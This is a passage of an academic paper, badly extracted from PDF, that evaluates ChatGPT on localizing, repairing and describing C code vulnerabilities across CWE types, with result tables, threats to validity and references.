equals“[2,3,5,9,14,23]”,𝐿𝑖𝑛𝑒𝑠 𝑝𝑟𝑒𝑑𝑖𝑐𝑡 equals“[1,3,5,11,15,16,17,21,22,23]”and 𝐿𝑖𝑛𝑒𝑠 𝑏𝑜𝑡ℎ equals“[3,5,23]”.Accordingtothesevalues,weobtainthat𝑃𝑟𝑒𝑐𝑖𝑠𝑖𝑜𝑛 = 3,𝑅𝑒𝑐𝑎𝑙𝑙 = 3 10 6 and𝐻𝑖𝑡@𝐴𝑐𝑐 =1. 0.6 0.4 0.2 noisicerP 1.0 0.8 2 9 6 6 6 9 1 7 3 3 4 4 - - - - E E E E W W W W C C C C 0.0
CWE-119 CWE-125 CWE-189 CWE-20 CWE-200 CWE-264 CWE-362 CWE-399 CWE-416 CWE-476 (a) Precision llaceR 1.0 0.8 0.6 0.4 0.2 0.0 CWE-119 CWE-125 CWE-189 CWE-20 CWE-200 CWE-264 CWE-362 CWE-399 CWE-416 CWE-476 (b) Recall Fig.3. Boxplotofthevulnerabilitylocationresults Results.Table8showstheaveragevulnerabilitylocationperformanceofChatGPTacrossdifferent typesandFig.4illustratestheboxplotofChatGPTperformanceoneachtype.Differentcolors ,Vol.1,No.1,Article.Publicationdate:April2024.ProsandCons!EvaluatingChatGPTonSoftwareVulnerability 13 Table8. TheperformanceofChatGPTonvulnerabilitylocalization CWEType #Size Hit@Acc Precision Recall CWE-119 11 0.36 0.09 0.22 CWE-125 14 0.29 0.15 0.13 CWE-189 9 0 0 0 CWE-20 12 0.42 0.25 0.09 CWE-200 10 0.40 0.20 0.28 CWE-264 9 0.22 0.22 0.06 CWE-362 10 0.30 0.15 0.09 CWE-399 9 0.11 0.01 0.11 CWE-416 11 0.27 0.23 0.09 CWE-476 10 0.20 0.12 0.12 Average 105 0.27 0.15 0.12 Note: ≤ 0.10; ≥ 0.20 are used to highlight performances for a better illustration. Based on this table as well as the detailed figure, we can achieve the following observations: 1) Overall, ChatGPT has a certain abilitytolocatethepotentialriskylinesinagivenvulnerablefunction.Thatis,itachievesagood Hit@Accperformanceof0.27.2)ChatGPTperformswellinidentifyingthevulnerabilityposition insomeCWEtypes(i.e.,CWE-20,CWE-200,CWE-264,andCWE-416)withacceptableprecision (i.e.,≥ 0.20).However,itperformsbadlyonCWE-189,whichmeans“NumericErrors”cannotbe easilyunderstoodbyChatGPT.3)ConsideringbothPrecisionandRecallshowninFig.4,wecan findthatChatGPThasabadmiddleperformance(i.e.,0,linesinorange)ofeachCWEtypeand performsstablyinfiveCWEtypes(i.e.,CWE-119,CWE-125,CWE-20,CWE-200,andCWE-362) relatively. Finding-7.ChatGPTexhibitsacertaincapabilityinvulnerabilitylocationsanditsperformance varies among different CWE types. It performs well in locating CWE-119, CWE-125, CWE-20, CWE-200,andCWE-362,butperformsbaddlyinCWE-189. 4.4 RQ-4:EvaluatingVulnerabilityRepairofChatGPT Setting.WeinstructChatGPTwiththefollowingprompts(i.e.,Prompt4.1andPrompt4.2)to tell it to repair vulnerable code: 1) providing ChatGPT with the vulnerable code to explore its performance(Prompt4.1).2)providingChatGPTwithvulnerablerelevantlineswhenthevulnerable codeexiststoinvestigatetheperformancedifferences(Prompt4.2).Table9showanexampleof howweinvestigateChatGPT’sabilityofvulnerabilityrepair. Prompt4.1:IwillprovideyouwithavulnerableCcodesnippetandyoumustrepairit.ThisC codesnippetdefinitelyhasavulnerability,soyoudon’tneedtodeterminewhetherthereisa vulnerability,justoutputtherepairedwholeccodesnippetwithoutexplanation. Prompt4.2:IwillprovideyouwithavulnerableCcodesnippetandvulnerablelines,youmust repair it. This C code snippet definitely has a vulnerability, so you don’t need to determine whetherthereisavulnerability.Youneedtousetheindextolabeleachlineofcode,andIwill provideyouwithlinesofcodethatarevulnerablesuchasLines:[1,4,5],justoutputtherepaired wholeccodesnippetwithoutexplanation. ,Vol.1,No.1,Article.Publicationdate:April2024.14 XinYin Results.Duetothehiddennaturalnessofvulnerabilitiesandthelackofcontext,itisdifficultto determinewhetherChatGPThassuccessfullyfixedavulnerabilitythroughmanualobservation. Therefore,whenevaluating,wechoosethecodewithonlyonelineofvulnerabilityanddetermine whetherChatGPThasfixedthevulnerablelineanditscontextualstatements.Ifso,theperformance metricHit iscalculatedas1,indicatingthatithastheabilitytofixthevulnerability.Otherwise, theHit isassignedwith0.Table10displaysdetailedresultsonhowChatGPTperformsonTop-10 CWEtypes.TheHitmetricindicateswhetherChatGPTsuccessfullyfixesthevulnerableline,while Hit𝑐𝑡𝑥 meanstheChatGPT’sperformanceprovidedwithadditionalcontextinformation(i.e.,the vulnerablerelevantlines).Finally,thecolumn“#Manual”meansthenumberofpatchescorrectly generatedbyChatGPTwhenwemanuallycompareitwiththegroundtruth. Basedonthetable,wecanmakethefollowingobservations: • Overall,ChatGPTshowslimitedsuccessinrepairingvulnerablecodesnippets,withanaverage Hitrateof0.2andHit𝑐𝑡𝑥 of0.24.Thissuggeststhatthereisroomforimprovementinitsability todetectandfixvulnerabilities. • TheperformanceofChatGPTvariesacrossdifferentCWEtypes.Forsometypes,likeCWE-264, ithasaperfectscore(1)inbothHitandHit𝑐𝑡𝑥,whileforothers,likeCWE-476andCWE-119,it failstofixthevulnerabilityaltogether. • Providingvulnerablelines(Prompt4.2)doesnotconsistentlyimproveChatGPT’sperformance. ForsomeCWEtypes,theHit𝑐𝑡𝑥 ishigherthantheHitrate(e.g.,CWE-189),whileforothers,it remainsthesameordecreases(e.g.,CWE-20).Thisindicatesthattheextrainformationmaynot alwaysbehelpfulforChatGPTinrepairingthevulnerability. • ChatGPThasthetrivialabilitytorepairavulnerability.
Finding-8:ChatGPThaslimitedabilityinrepairingvulnerabilitynomatterwhenprovidedwith contextinformationornot. WealsodelveintothespecificinformationofCWEtypestoanalyzeChatGPT’sperformance: • CWE-264(PrivilegeEscalation).ChatGPTperformswellinfixingvulnerabilitiesrelatedto privilegeescalation,withaperfectscoreof1inbothhitandhit𝑐𝑡𝑥.Thiscouldbebecauseprivilege escalationvulnerabilitiesofteninvolvespecificpatterns,suchasincorrectpermissionchecksor improperuseofprivileges,whichtheChatGPTmighthavelearnedeffectivelyduringtraining. • CWE-476(NULLPointerDereference)andCWE-119(ImproperRestrictionofOpera- tionswithintheBoundsofaMemoryBuffer).ChatGPTstrugglestofixthesevulnerabilities evenfindnovulnerableposition,resultinginahitandhit𝑐𝑡𝑥 scoreof0.Thesetypesofvulnerabili- tiesmightbemorechallengingfortheChatGPTduetotheircomplexnaturalnessanddependence onthespecificcontextofthecode.Forinstance,detectingandfixingaNULLpointerdereference oftenrequiresunderstandingthecontrolflowanddataflowofthecode,whilebuffer-related vulnerabilitiesrequireadeepunderstandingofmemorymanagement. • CWE-189(NumericErrors)andCWE-125(Out-of-boundsRead).ChatGPT’sperformance variesforthesetypes,withhitscoresof0.17and0.2,andhit𝑐𝑡𝑥 scoresof0.5and0.2,respectively. ThissuggeststhattheChatGPTmighthavesomeunderstandingofthepatternsinvolvedin thesevulnerabilities,butitssuccessinfixingthemisinconsistent.Numericerrorsofteninvolve incorrectcalculationsordataconversions,whileout-of-boundsreadissuestypicallystemfrom improperboundarychecks.ImprovingChatGPT’sunderstandingofthesepatternsandtheir underlyingcausescouldpotentiallyenhanceitsperformanceinrepairingthesevulnerabilities. ,Vol.1,No.1,Article.Publicationdate:April2024.ProsandCons!EvaluatingChatGPTonSoftwareVulnerability 15 Finding-9:ChatGPT’sperformanceinrepairingdifferentCWEtypescanbeattributedtoitsability torecognizeandunderstandspecificvulnerabilitypatterns.Forcertaintypeswithwell-defined patterns,itperformswell,whileforotherswithmorecomplexorcontext-dependentpatterns,it strugglestoidentifyandfixthevulnerabilities. Table9. ExamplesofVulnerabilityRepair Setting VulnerableCode Prompt IwillprovideyouwithavulnerableCcodesnippetandyoumustrepairit.ThisCcodesnippet definitelyhasavulnerability,soyoudon’tneedtodeterminewhetherthereisavulnerability, justoutputtherepairedwholeccodesnippetwithoutexplanation. Input AnexampleofaCcodesnippetwithvulnerabilities(CVE-2019-17773). Setting VulnerableCode&Vulnerablerelevantlines Prompt IwillprovideyouwithavulnerableCcodesnippetandvulnerablelines,youmustrepairit. ThisCcodesnippetdefinitelyhasavulnerability,soyoudon’tneedtodeterminewhether thereisavulnerability.Youneedtousetheindextolabeleachlineofcode,andIwillprovide youwithlinesofcodethatarevulnerablesuchasLines:[1,4,5],justoutputtherepaired wholeccodesnippetwithoutexplanation. Input AnexampleofaCcodesnippetwithvulnerabilities(CVE-2019-17773). Vulnerablerelevantlines:[4,5,8,9,10,11,12,13,14,15,16,18,20,21,23,24]. Table10. ThesoftwarevulnerabilityrepairperformanceofChatGPTonTop-10CWEtypes CWEType #Size Hit Hit𝑐𝑡𝑥 #Manual CWE-20 7 0.29 0.14 1/1 CWE-416 6 0.17 0.17 0/1 CWE-189 6 0.17 0.50 0/0 CWE-119 5 0 0.20 0/0 CWE-125 5 0.20 0.20 0/0 CWE-476 5 0 0 0/0 CWE-362 4 0 0.25 0/0 CWE-399 3 0.33 0 0/0 CWE-200 3 0.33 0.33 0/0 CWE-264 2 1 1 0/0 Average 46 0.20 0.24 1/2 4.5 RQ-5:EvaluatingVulnerabilityDescriptionofChatGPT Setting. We instruct ChatGPT with a designated prompt, guiding it to perform the role of a vulnerabilitydescriptor.Table12illustratesanexampleofourapproachtoevaluatingChatGPT’s proficiencyinconductingvulnerabilitydescriptions. Prompt5.1:IwillprovideyouwithavulnerableCcodesnippetandyoumustgenerateaCVE description.ThisCcodesnippetdefinitelyhasavulnerability,soyoudon’tneedtodetermine whetherthereisavulnerability,justoutputtheCVEdescription. ToevaluatetheprecisionofgeneratedCVEdescription,weadoptthewidelyusedperformance metricROUGE[36],whichisasetofmetricsandisusedforevaluatingautomaticsummarizationand ,Vol.1,No.1,Article.Publicationdate:April2024.16 XinYin machinetranslationsoftwareinnaturallanguageprocessing.Themetricscompareanautomatically produced summary or translation against a reference or a set of references (human-produced) summaryortranslation.Here,wetotallyconsiderthreesettings:1,2,andL. Table11. ThesoftwarevulnerabilitydescriptionperformanceofChatGPTonTop-10CWEtypes CWE Type # Size ROUGE-1 ROUGE-2 ROUGE-L C/I/V CWE-125 22 0.21 0.05 0.20 0/0/0 CWE-362 21 0.24 0.08 0.22 0/0/0 CWE-189 20 0.21 0.05 0.18 0/0/0 CWE-119 19 0.29 0.12 0.27 2/6/0 CWE-200 18 0.26 0.11 0.25 0/0/0 CWE-476 17 0.25 0.10 0.24 0/0/0 CWE-416 16 0.23 0.07 0.21 0/0/0 CWE-20 15 0.25 0.08 0.22 0/0/0
CWE-399 15 0.26 0.11 0.26 0/0/0 CWE-264 13 0.24 0.08 0.23 0/0/0 Average 176 0.24 0.08 0.23 0/0/0 Results.Table11representsthevulnerabilitydescriptioncapabilitiesofChatGPTonTop-10CWE types.Basedontheseresults,wecanmakethefollowingobservations:1)TheaverageROUGEscores of0.24forROUGE-1,0.08forROUGE-2,and0.23forROUGE-L,whichindicatesthatChatGPT’s performanceingeneratingvulnerabilitydescriptionsismoderate,withroomforimprovementin accuratelydescribingandcapturingthenuancesofvariousCWEtypes.2)ChatGPT’sperformance ingeneratingCVEdescriptionsvariesacrossdifferentCWEtypes,withROUGEscoresranging from0.21to0.29forROUGE-1,0.05to0.12forROUGE-2,and0.18to0.27forROUGE-L.3)Thelow ROUGE-2scoresindicatethatChatGPT’sabilitytogenerateaccurateandrelevanthigher-order n-grams(pairsofconsecutivewords)invulnerabilitydescriptionsislimited,suggestingpotential issueswithcapturingspecificanddetailedinformation. Finding-10:ChatGPTdemonstratesmoderateperformanceingeneratingCVEdescriptionsfor variousCWEtypes,withvariedsuccessacrosscategoriesandlimitedaccuracyincapturingspecific details. AlthoughChatGPThashigherperformanceforsomeCWEtypes,itslimitedabilitytogenerate accuratehigher-ordern-gramssuggestsaneedforfurthermodelrefinement.Adeeperanalysisof theperformanceacrossspecificCWEtypescanhelpguidefutureimprovementstoenhancethe model’sunderstandinganddescriptionofvariousvulnerabilities.TounderstandwhyChatGPT performs well for some CWE types and not for others, we can examine the naturalness and complexityofthesevulnerabilities: • HigherPerformanceinCWE-119andCWE-200.ChatGPTachievesrelativelybetterresults ingeneratingdescriptionsforCWE-119(ImproperRestrictionofOperationswithintheBoundsof aMemoryBuffer)andCWE-200(InformationExposure).Thesevulnerabilitiesinvolveconcepts ,Vol.1,No.1,Article.Publicationdate:April2024.ProsandCons!EvaluatingChatGPTonSoftwareVulnerability 17 thatmightbemorefrequentinthetrainingdata,suchasmemorymanagementandinformation disclosure,leadingtoabetterunderstandingandmoreaccuratedescriptions. • LowerPerformanceinCWE-125andCWE-189.ChatGPThaslowerperformanceingen- eratingdescriptionsforCWE-125(Out-of-boundsRead)andCWE-189(NumericErrors).This mightbeduetothecomplexityofthesevulnerabilities,whichinvolveintricatelogicandnu- mericcalculationsthatcouldbechallengingfortheChatGPTtofullyunderstandanddescribe accurately. • PotentialExplanationsforVariability.ThevariabilityinperformanceacrossdifferentCWE typescouldbeattributedtomultiplefactors,suchasthequantityandqualityoftrainingdata foreachCWEtype,theinherentcomplexityofthevulnerability,orthepreciseanddetailed terminologyneededtoaccuratelydescribeaparticularvulnerability.Forexample,describing aCWE-125(Out-of-boundsRead)vulnerabilitymightrequirespecifictermslike“arrayindex”, “buffer”or“memoryaccess”toaccuratelyconveytheissue.Similarly,forCWE-189(Numeric Errors),itmaybenecessarytousetermslike“integeroverflow”,“truncation”or“arithmetic operation”toprovideanaccuratedescription.IfChatGPThasnotencounteredenoughexamples ofsuchspecificlanguageduringitstraining,itmaystruggletogenerateaccurateanddetailed descriptionsforthesevulnerabilities. Finding-11:ChatGPTdemonstratesmoderateoverallperformanceingeneratingvulnerability descriptions, with varied outcomes across different CWE types. This variability can be attrib- utedtofactorssuchasthequalityandquantityoftrainingdata,theinherentcomplexityofthe vulnerabilities,andthespecificityofthelanguagerequiredtodescribethem. Cause Cause Impact Impact 27.6% 18.6% 51.7% 44.4% 29.8% 28.0% Vector Vector (a) CVEdescription (b) ChatGPT’soutputdescription Fig.4. Distributionofkeyaspect 5 THREATSTOVALIDATE ThreatstoInternalValiditymainlycontainsintwo-folds.Thefirstoneisthedesignofaprompt to instruct ChatGPT to give out responses. We design our prompt according to the practical advice[49]whichhasbeenverifiedbymanyusersonlineandcanobtainagoodresponsefrom ChatGPT.Furthermore,ChatGPTwillgenerateresponseswithsomerandomnessevengiventhe sameprompt.Therefore,weset“temperature”to0,whichwillreducetherandomnessatmostand wetryourbesttocollectalltheseresultsintwodaystoavoidthemodelbeingupgraded.The secondoneisaboutthepotentialmistakesintheimplementationofstudiedbaselines.Tominimize suchthreats,wedirectlyusetheoriginalsourcecodesharedbycorrespondingauthors. ,Vol.1,No.1,Article.Publicationdate:April2024.18 XinYin Table12. AvulnerablecodeforChatGPTtogeneratevulnerabilitydescription ImproperNeutralizationofSpecialElementsusedinaCommandVulnerability(CWE-77)inneomutt Prompt IwillprovideyouavulnerableCcodesnippetandyoumustgeneratecvedescription.ThisCcodesnippet definitelyhasavulnerability,soyoudon’tneedtodeterminewhetherthereisavulnerability,justoutput cvedescription. Input AnexampleofaCcodesnippetwithvulnerabilities.CVEID:CVE-2018-14349.
ResponseFromChatGPT AnissuewasdiscoveredinMuttbefore1.10.1andNeoMuttbefore2018-07-16.Theyallowremote IMAPserverstoexecutearbitrarycommandsviabackquotecharacters,relatedtothemailboxes commandassociatedwithamanualsubscriptionorunsubscription. CVEDescription AnissuewasdiscoveredinMuttbefore1.12.2.imap_subscribe()inimap.cmishandlesmailboxnames containingIMAPmetacharacters,asdemonstratedbyanamecomposedofthe&characterand othermetacharacters.Thiscanleadtoremotedenial-of-service(diskconsumption),ortolocal denial-of-serviceandinformationdisclosureinvolvingthemutate_bufferfunctioninmutt_mem.c,a relatedissueto CVE-2018-14349. ThreatstoExternalValiditymaycorrespondtothegeneralizationofthestudieddataset.To mitigatethisthreat,weadoptthemostlarge-scalevulnerabilitydatasetwithdiverseinformation aboutthevulnerabilities,whicharecollectedfrompracticalprojects,andthesevulnerabilitiesare recordedintheCommonVulnerabilitiesandExposures(CVE).However,wedonotconsiderthese vulnerabilitiesfoundrecently.Besides,wedonotadoptanotherlarge-scalevulnerabilitydataset namedSARDsinceitisbuiltmanuallyandcannotsatisfythedistinctcharacteristicsofthereal world[8,27]. ThreatstoConstructValiditymainlycorrespondtotheperformancemetricsinourevaluations. Tominimizesuchthreats,weconsiderafewwidelyusedperformancemetricstoevaluatethe performanceofChatGPTondifferenttypesoftasks.(e.g.,Accuracy,Precision,Recall,andROUGE). 6 CONCLUSION ThispaperaimstocomprehensivelyinvestigatethecapabilitiesofChatGPTforsoftwarevulnera- bilitytasksaswellasitsimpacts.Toachievethat,weadoptalarge-scalevulnerabilitydataset(named Big-Vul)andthenconductseveralexperimentsfocusingonfivedimensions:(1)Vulnerability Detection,(2)VulnerabilityAssessment,(3)VulnerabilityLocalization,(4)Vulnerability Repair,and(5)VulnerabilityDescription.Overall,althoughChatGPTshowssomeabilityin certainareas,itstillneedsfurtherimprovementtobecompetentinsoftwarevulnerabilityrelated tasks.OurresearchconductsacomprehensivesurveyofChatGPT’scapabilitiesandprovidesa referenceforenhancingitsunderstandingofsoftwarevulnerabilitiesinthefuture. REFERENCES [1] 2023.Joern. https://github.com/joernio/joern [2] 2023.Replication. https://figshare.com/s/04856ae0c9005a888e03 [3] WasiUddinAhmad,SaikatChakraborty,BaishakhiRay,andKai-WeiChang.2021.Unifiedpre-trainingforprogram understandingandgeneration.arXivpreprintarXiv:2103.06333(2021). [4] YejinBang,SamuelCahyawijaya,NayeonLee,WenliangDai,DanSu,BryanWilie,HolyLovenia,ZiweiJi,Tiezheng Yu,WillyChung,etal.2023.Amultitask,multilingual,multimodalevaluationofchatgptonreasoning,hallucination, andinteractivity.arXivpreprintarXiv:2302.04023(2023). [5] GuruBhandari,AmaraNaseer,andLeonMoonen.2021.CVEfixes:automatedcollectionofvulnerabilitiesandtheir fixesfromopen-sourcesoftware.InProceedingsofthe17thInternationalConferenceonPredictiveModelsandData AnalyticsinSoftwareEngineering.30–39. [6] TomBrown,BenjaminMann,NickRyder,MelanieSubbiah,JaredDKaplan,PrafullaDhariwal,ArvindNeelakantan, PranavShyam,GirishSastry,AmandaAskell,etal.2020.Languagemodelsarefew-shotlearners.Advancesinneural informationprocessingsystems33(2020),1877–1901. [7] SicongCao,XiaobingSun,LiliBo,RongxinWu,BinLi,andChuanqiTao.2022.MVD:Memory-RelatedVulnerability DetectionBasedonFlow-SensitiveGraphNeuralNetworks.arXivpreprintarXiv:2203.02660(2022). ,Vol.1,No.1,Article.Publicationdate:April2024.ProsandCons!EvaluatingChatGPTonSoftwareVulnerability 19 [8] SaikatChakraborty,RahulKrishna,YangruiboDing,andBaishakhiRay.2021. Deeplearningbasedvulnerability detection:Arewethereyet.IEEETransactionsonSoftwareEngineering(2021). [9] chatgptendpoint.2023.IntroducingChatGPTandWhisperAPIs.https://openai.com/blog/introducing-chatgpt-and- whisper-apis. [10] ZiminChen,SteveJamesKommrusch,MicheleTufano,Louis-NoëlPouchet,DenysPoshyvanyk,andMartinMonperrus. 2019. Sequencer:Sequence-to-sequencelearningforend-to-endprogramrepair. IEEETransactionsonSoftware Engineering(2019). [11] XiaoCheng,GuanqinZhang,HaoyuWang,andYuleiSui.2022.Path-sensitivecodeembeddingviacontrastivelearning forsoftwarevulnerabilitydetection.InProceedingsofthe31stACMSIGSOFTInternationalSymposiumonSoftware TestingandAnalysis.519–531. [12] JonathanHChoi,KristinEHickman,AmyMonahan,andDanielSchwarcz.2023.Chatgptgoestolawschool.Available atSSRN(2023). [13] PaulFChristiano,JanLeike,TomBrown,MiljanMartic,ShaneLegg,andDarioAmodei.2017.Deepreinforcement learningfromhumanpreferences.Advancesinneuralinformationprocessingsystems30(2017). [14] GangFan,RongxinWu,QingkaiShi,XiaoXiao,JinguoZhou,andCharlesZhang.2019.Smoke:scalablepath-sensitive memoryleakdetectionformillionsoflinesofcode.In2019IEEE/ACM41stInternationalConferenceonSoftware Engineering(ICSE).IEEE,72–82.
[15] JiahaoFan,YiLi,ShaohuaWang,andTienNNguyen.2020.AC/C++codevulnerabilitydatasetwithcodechanges andCVEsummaries.InProceedingsofthe17thInternationalConferenceonMiningSoftwareRepositories.508–512. [16] ZhangyinFeng,DayaGuo,DuyuTang,NanDuan,XiaochengFeng,MingGong,LinjunShou,BingQin,TingLiu, DaxinJiang,etal.2020. Codebert:Apre-trainedmodelforprogrammingandnaturallanguages. arXivpreprint arXiv:2002.08155(2020). [17] AndrewFeutrill,DineshaRanathunga,YuvalYarom,andMatthewRoughan.2018.Theeffectofcommonvulnerability scoringsystemmetricsonvulnerabilityexploitdelay.In2018SixthInternationalSymposiumonComputingand Networking(CANDAR).IEEE,1–10. [18] MichaelFuandChakkritTantithamthavorn.2022.LineVul:ATransformer-basedLine-LevelVulnerabilityPrediction. (2022). [19] AidanGilson,ConradSafranek,ThomasHuang,VimigSocrates,LingChi,RichardAndrewTaylor,andDavidChartash. 2022.HowWellDoesChatGPTDoWhenTakingtheMedicalLicensingExams?TheImplicationsofLargeLanguage ModelsforMedicalEducationandKnowledgeAssessment.medRxiv(2022),2022–12. [20] YoavGoldberg.2023.Friendorfoe?teachersdebatechatgpt. https://www.axios.com/2023/01/13/chatgpt-schools- teachers-ai-debate [21] Yoav Goldberg. 2023. Some remarks on large language models. https://gist.github.com/yoavg/ 59d174608e92e845c8994ac2e234c8a9 [22] DayaGuo,ShuaiLu,NanDuan,YanlinWang,MingZhou,andJianYin.2022. UniXcoder:UnifiedCross-Modal Pre-trainingforCodeRepresentation.arXivpreprintarXiv:2203.03850(2022). [23] DayaGuo,ShuoRen,ShuaiLu,ZhangyinFeng,DuyuTang,ShujieLiu,LongZhou,NanDuan,AlexeySvyatkovskiy, ShengyuFu,etal.2020.Graphcodebert:Pre-trainingcoderepresentationswithdataflow.arXivpreprintarXiv:2009.08366 (2020). [24] HaoGuo,SenChen,ZhenchangXing,XiaohongLi,YudeBai,andJiamouSun.2022. Detectingandaugmenting missingkeyaspectsinvulnerabilitydescriptions.ACMTransactionsonSoftwareEngineeringandMethodology(TOSEM) 31,3(2022),1–27. [25] HaoGuo,ZhenchangXing,SenChen,XiaohongLi,YudeBai,andHuZhang.2021. Keyaspectsaugmentationof vulnerabilitydescriptionbasedonmultiplesecuritydatabases.In2021IEEE45thAnnualComputers,Software,and ApplicationsConference(COMPSAC).IEEE,1020–1025. [26] HaoGuo,ZhenchangXing,andXiaohongLi.2020. Predictingmissinginformationofkeyaspectsinvulnerability reports.arXivpreprintarXiv:2008.02456(2020). [27] DavidHin,AndreyKan,HuamingChen,andMAliBabar.2022. LineVD:Statement-levelVulnerabilityDetection usingGraphNeuralNetworks.arXivpreprintarXiv:2203.05181(2022). [28] SaadKhanandSimonParkinson.2018. Reviewintostateoftheartofvulnerabilityassessmentusingartificial intelligence.GuidetoVulnerabilityAnalysisforComputerNetworksandSystems(2018),3–32. [29] TrietHMLe,HuamingChen,andMAliBabar.2021.Asurveyondata-drivensoftwarevulnerabilityassessmentand prioritization.ACMComputingSurveys(CSUR)(2021). [30] TrietHuynhMinhLe,DavidHin,RolandCroft,andMAliBabar.2021.Deepcva:Automatedcommit-levelvulnerability assessmentwithdeepmulti-tasklearning.In202136thIEEE/ACMInternationalConferenceonAutomatedSoftware Engineering(ASE).IEEE,717–729. ,Vol.1,No.1,Article.Publicationdate:April2024.20 XinYin [31] WenLi,HaipengCai,YuleiSui,andDavidManz.2020.PCA:memoryleakdetectionusingpartialcall-pathanalysis. InProceedingsofthe28thACMJointMeetingonEuropeanSoftwareEngineeringConferenceandSymposiumonthe FoundationsofSoftwareEngineering.1621–1625. [32] YiLi,ShaohuaWang,andTienNNguyen.2021.Vulnerabilitydetectionwithfine-grainedinterpretations.InProceedings ofthe29thACMJointMeetingonEuropeanSoftwareEngineeringConferenceandSymposiumontheFoundationsof SoftwareEngineering.292–303. [33] ZhenLi,DeqingZou,ShouhuaiXu,ZhaoxuanChen,YaweiZhu,andHaiJin.2021.Vuldeelocator:adeeplearning-based fine-grainedvulnerabilitydetector.IEEETransactionsonDependableandSecureComputing(2021). [34] ZhenLi,DeqingZou,ShouhuaiXu,HaiJin,YaweiZhu,andZhaoxuanChen.2021.Sysevr:Aframeworkforusing deeplearningtodetectsoftwarevulnerabilities.IEEETransactionsonDependableandSecureComputing(2021). [35] ZhenLi,DeqingZou,ShouhuaiXu,XinyuOu,HaiJin,SujuanWang,ZhijunDeng,andYuyiZhong.2018.Vuldeepecker: Adeeplearning-basedsystemforvulnerabilitydetection.InProceedingsofthe25thAnnualNetworkandDistributed SystemSecuritySymposium. [36] Chin-YewLin.2004.Rouge:Apackageforautomaticevaluationofsummaries.InTextsummarizationbranchesout. 74–81. [37] PengfeiLiu,WeizheYuan,JinlanFu,ZhengbaoJiang,HiroakiHayashi,andGrahamNeubig.2023.Pre-train,prompt, andpredict:Asystematicsurveyofpromptingmethodsinnaturallanguageprocessing.Comput.Surveys55,9(2023), 1–35. [38] CorporationMITRE.2023.CommonVulnerabilitiesandExposures(CVE). https://cve.mitre.org/
[39] ChaoNi,LiyuShen,WeiWang,XiangChen,XinYin,andLexiaoZhang.2023. FVA:AssessingFunction-Level VulnerabilitybyIntegratingFlow-SensitiveStructureandCodeStatementSemantic.In2023IEEE/ACM31stInternational ConferenceonProgramComprehension(ICPC).IEEE,339–350. [40] ChaoNi,WeiWang,KaiwenYang,XinXia,KuiLiu,andDavidLo.2022. TheBestofBothWorlds:Integrating SemanticFeatureswithExpertFeaturesforDefectPredictionandLocalization.InProceedingsofthe202230thACM JointMeetingonEuropeanSoftwareEngineeringConferenceandSymposiumontheFoundationsofSoftwareEngineering. ACM,672–683. [41] ChaoNi,KaiwenYang,XinXia,DavidLo,XiangChen,andXiaohuYang.2022.DefectIdentification,Categorization, andRepair:BetterTogether.arXivpreprintarXiv:2204.04856(2022). [42] ChaoNi,XinYin,KaiwenYang,DehaiZhao,ZhenchangXing,andXinXia.2023.DistinguishingLook-AlikeInnocent andVulnerableCodebySubtleSemanticRepresentationLearningandExplanation.InProceedingsofthe31stACM JointEuropeanSoftwareEngineeringConferenceandSymposiumontheFoundationsofSoftwareEngineering.1611–1622. [43] OpenAI.2022.ChatGPT:OptimizingLanguageModelsforDialogue.(2022).https://openai.com/blog/chatgpt/. [44] LongOuyang,JeffreyWu,XuJiang,DiogoAlmeida,CarrollWainwright,PamelaMishkin,ChongZhang,Sandhini Agarwal,KatarinaSlama,AlexRay,etal.2022.Traininglanguagemodelstofollowinstructionswithhumanfeedback. AdvancesinNeuralInformationProcessingSystems35(2022),27730–27744. [45] AdamPaszke,SamGross,FranciscoMassa,AdamLerer,JamesBradbury,GregoryChanan,TrevorKilleen,Zeming Lin,NataliaGimelshein,LucaAntiga,AlbanDesmaison,AndreasKopf,EdwardYang,ZacharyDeVito,MartinRaison, AlykhanTejani,SasankChilamkurthy,BenoitSteiner,LuFang,JunjieBai,andSoumithChintala.2019.PyTorch:An ImperativeStyle,High-PerformanceDeepLearningLibrary. InAdvancesinNeuralInformationProcessingSystems 32.CurranAssociates,Inc.,8024–8035. http://papers.neurips.cc/paper/9015-pytorch-an-imperative-style-high- performance-deep-learning-library.pdf [46] AlecRadford,KarthikNarasimhan,TimSalimans,IlyaSutskever,etal.2018.Improvinglanguageunderstandingby generativepre-training.(2018). [47] JohnSchulman,FilipWolski,PrafullaDhariwal,AlecRadford,andOlegKlimov.2017.Proximalpolicyoptimization algorithms.arXivpreprintarXiv:1707.06347(2017). [48] YiqiuShen,LauraHeacock,JonathanElias,KeithDHentel,BeatriuReig,GeorgeShih,andLindaMoy.2023.ChatGPT andotherlargelanguagemodelsaredouble-edgedswords.,230163pages. [49] JessicaShieh.2023. BestpracticesforpromptengineeringwithOpenAIAPI. OpenAI,Februaryhttps://help.openai. com/en/articles/6654000-best-practices-for-prompt-engineering-with-openai-api(2023). [50] GeorgiosSpanosandLefterisAngelis.2018.Amulti-targetapproachtoestimatesoftwarevulnerabilitycharacteristics andseverityscores.JournalofSystemsandSoftware146(2018),152–166. [51] JiamouSun,ZhenchangXing,HaoGuo,DehengYe,XiaohongLi,XiweiXu,andLimingZhu.2022. Generating informativeCVEdescriptionfromExploitDBpostsbyextractivesummarization. ACMTransactionsonSoftware EngineeringandMethodology(TOSEM)(2022). [52] Symantec.2023.securityFocus. https://www.securityfocus.com/ [53] AshishVaswani,NoamShazeer,NikiParmar,JakobUszkoreit,LlionJones,AidanNGomez,ŁukaszKaiser,andIllia Polosukhin.2017.Attentionisallyouneed.Advancesinneuralinformationprocessingsystems30(2017). ,Vol.1,No.1,Article.Publicationdate:April2024.ProsandCons!EvaluatingChatGPTonSoftwareVulnerability 21 [54] YueWang,WeishiWang,ShafiqJoty,andStevenCHHoi.2021.Codet5:Identifier-awareunifiedpre-trainedencoder- decodermodelsforcodeunderstandingandgeneration.arXivpreprintarXiv:2109.00859(2021). [55] YuemingWu,DeqingZou,ShihanDou,WeiYang,DuoXu,andHaiJin.2022.VulCNN:AnImage-inspiredScalable VulnerabilityDetectionSystem.(2022). [56] XinYinandChaoNi.2024.Multitask-basedEvaluationofOpen-SourceLLMonSoftwareVulnerability.arXivpreprint arXiv:2404.02056(2024). [57] XianZhan,LinglingFan,SenChen,FengWe,TianmingLiu,XiapuLuo,andYangLiu.2021. Atvhunter:Reliable versiondetectionofthird-partylibrariesforvulnerabilityidentificationinandroidapplications.In2021IEEE/ACM 43rdInternationalConferenceonSoftwareEngineering(ICSE).IEEE,1695–1707. [58] 